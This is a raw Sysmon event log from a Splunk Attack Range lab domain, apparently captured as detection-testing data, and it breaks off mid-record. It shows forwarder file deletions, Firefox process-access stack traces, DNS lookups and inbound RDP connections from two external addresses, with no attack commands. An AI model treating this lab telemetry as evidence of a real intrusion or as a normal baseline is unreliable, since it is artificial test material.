Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DACB3E8FB30DD5C1C51F5010ED984FE2,SHA256=0DD4123B804CE7ADE4E9BDF9D30198AB6A2478C431E31BCFB4B9A3D520329D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:18.343{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C842C8993F305DCAECE1EFBF7626949F,SHA256=93F82C9D14289D01F103380B63249619ACE488DCF17EB73F5CF0576C03724D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:19.953{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=761CD4C4464AB364410F06ED3DA23D60,SHA256=8EEE38E41A345602820763DBBE935B4C86DB4BC65336BC9A76A38AE3993C14EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:16.878{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58711-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:19.609{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68F43BFEFB6692EAC6A5E1515BC1B7D,SHA256=75BD1F5E83567AB53AF9E6343C18323CE95C573F7CA6B9D5DB780AEEB930E6E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:19.349{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC4C8D2AE94C69D995584672E974F451,SHA256=80FC582D15B65B778DF259BAE463D969F7EF41C1ED0CA11F5A2C78316335F1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:20.781{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA7C5332186B536CD243FC7CBF907DE7,SHA256=B191D31090D2BEB0EB658CC7178B5C61DE264569D62654CCA6AC53B30A94B231,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.409{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.409{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 23542300x80000000000000001051517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.361{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF4BEA4E10929DCD098C4E5BA6E3F0F5,SHA256=4C5121C1AA9476F4B3E6D863F45F15158123079E8D82D801B501360A03810A3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.162{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.162{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.154{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.154{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:21.890{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04F897E35F6D429F60D4EDF456CEDD93,SHA256=55B1B5891E34888654242F32D999EAF8E46D10F98A1E14815F99EAF9FF59AF7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:18.796{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59450-false10.0.1.12-8000- 354300x80000000000000001051525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.423{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52693- 354300x80000000000000001051524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.373{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55541- 354300x80000000000000001051523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.371{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54255- 354300x80000000000000001051522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.347{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local59418- 354300x80000000000000001051521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:19.917{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53458-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.369{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951127FBF5782D9384D1C05B0FF5E353,SHA256=F26CBD28477E7AE251E1D6A56F2FE54598272FAA1374AA5BC9AD70C5DC7A7E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:22.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1571880718ECCE12A0A98FF6C0158054,SHA256=DDF8BBE8CC9F8B69D3BAAA1EE4D01C466F0BAF483DE88DC3761E849143B50D61,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:21.531{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53795-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001051540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.692{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.692{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.692{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x80000000000000001051537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:20.682{5EBD8912-7B3A-6151-3A78-00000000FC01}7120adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.609{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.609{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.596{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.595{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.595{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.590{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.590{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.590{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.590{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.432{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FC7CA98CEDEB4F959A69403C29C8B25,SHA256=2B5F8DC47F373F1F635755DA7F64B2CA80039F68A4F2C7CAC6BB0F0091E9AF74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:22.114{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=091F6B2F1FDDEA85A6956EAD2156A182,SHA256=8F4D1426E77859641555D4CAA6DDF2CA75A02B50B87AE6774CD6B4B4C7CDD397,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:23.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACC085973D4A697006E16AB4C388F3F2,SHA256=C6A07C1AF01A582841BFFFF49D3808DA1EEB70E671B01ACB9D51512937DA0BBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:23.954{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla 